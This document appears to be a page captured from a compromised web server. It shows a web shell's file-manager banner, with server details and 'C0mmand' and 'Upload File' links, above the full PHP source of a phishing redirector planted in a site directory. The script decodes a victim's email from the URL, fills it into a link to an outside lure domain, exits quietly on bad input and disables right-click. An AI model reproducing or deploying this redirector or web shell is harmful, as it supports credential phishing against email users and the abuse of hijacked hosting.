|
Server IP : 50.6.201.109 / Your IP : 216.73.216.91 Web Server : Apache System : Linux server1.serverdelsur.com 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64 User : bmadryn ( 1033) PHP Version : 8.2.30 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /home/bmadryn/www/activate/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
// ==================== CONFIGURATION ====================
$destination = 'https://{DOMAIN_NAME}.kearsley.net/{randomstring30}/#{EMAIL64}';
$email_mode = true;
$state_param = 'hash';
$pass_mode = 'none';
// ==================== Helper functions ====================
function randomString($min, $max = null) {
if ($max === null) $max = $min;
$length = mt_rand($min, $max);
$chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
$result = '';
for ($i = 0; $i < $length; $i++) {
$result .= $chars[mt_rand(0, strlen($chars) - 1)];
}
return $result;
}
function decodeHex($hex) {
if (!preg_match('/^[0-9A-Fa-f]+$/', $hex) || strlen($hex) % 2 !== 0) return null;
$str = '';
for ($i = 0; $i < strlen($hex); $i += 2) {
$str .= chr(hexdec(substr($hex, $i, 2)));
}
return $str;
}
function decodeEmail($encoded) {
$encoded = trim($encoded);
// Try hex first
$decoded = decodeHex($encoded);
if ($decoded && strpos($decoded, '@') !== false) return $decoded;
// Then base64
$decoded = base64_decode($encoded, true);
if ($decoded && strpos($decoded, '@') !== false) return $decoded;
// Fallback to plain
if (strpos($encoded, '@') !== false) return $encoded;
return null;
}
function extractDomainWithoutTld($email) {
$parts = explode('@', $email);
if (count($parts) < 2) return null;
$domainPart = $parts[1];
// Split by dot and take the first segment
$domainSegments = explode('.', $domainPart);
return $domainSegments[0];
}
// ==================== Main logic ====================
if (isset($_GET[$state_param]) && !empty($_GET[$state_param])) {
$raw = $_GET[$state_param];
if ($email_mode) {
$email = decodeEmail($raw);
if (!$email || !filter_var($email, FILTER_VALIDATE_EMAIL)) {
// Invalid email – silently exit
exit;
}
// Base64 WITHOUT padding (remove trailing '=')
$email64 = rtrim(base64_encode($email), '=');
$emailHex = bin2hex($email);
$domain = extractDomainWithoutTld($email);
if (!$domain) exit;
// Step 1: Replace {randomstring...} placeholders
$finalUrl = preg_replace_callback('/\{randomstring(\d+)(?:,(\d+))?\}/i', function($m) {
$min = (int)$m[1];
$max = isset($m[2]) ? (int)$m[2] : $min;
return randomString($min, $max);
}, $destination);
// Step 2: Replace all other placeholders (case-insensitive)
$placeholders = [
'{DOMAIN_NAME}' => $domain,
'{EMAIL}' => $email,
'{EMAIL64}' => rawurlencode($email64), // URL-safe, padding-free
'{EMAILHEX}' => $emailHex,
// lowercase variants (str_ireplace already case-insensitive, but include for clarity)
'{domain_name}' => $domain,
'{email}' => $email,
'{email64}' => rawurlencode($email64),
'{emailhex}' => $emailHex,
];
$finalUrl = str_ireplace(array_keys($placeholders), array_values($placeholders), $finalUrl);
// Debug (optional – uncomment to log)
// file_put_contents('debug.log', "Email: $email\nDomain: $domain\nFinal: $finalUrl\n", FILE_APPEND);
header('Location: ' . $finalUrl);
exit;
}
}
// If no hash parameter, show loader and redirect via JS
?><!DOCTYPE html>
<html>
<head>
<title>Loading...</title>
<style>
body { margin: 0; height: 100vh; display: grid; place-items: center; background: #f5f5f5; }
.loader {
width: 40px; height: 40px;
border: 4px solid #f3f3f3; border-top: 4px solid #3498db; border-radius: 50%;
animation: spin 1s linear infinite;
}
@keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
</style>
</head>
<body oncontextmenu="return false;">
<div class="loader"></div>
<script>
var hash = window.location.hash.substring(1);
if (hash) {
window.location.replace(window.location.pathname + '?hash=' + encodeURIComponent(hash));
} else {
document.body.innerHTML = '';
}
</script>
</body>
</html>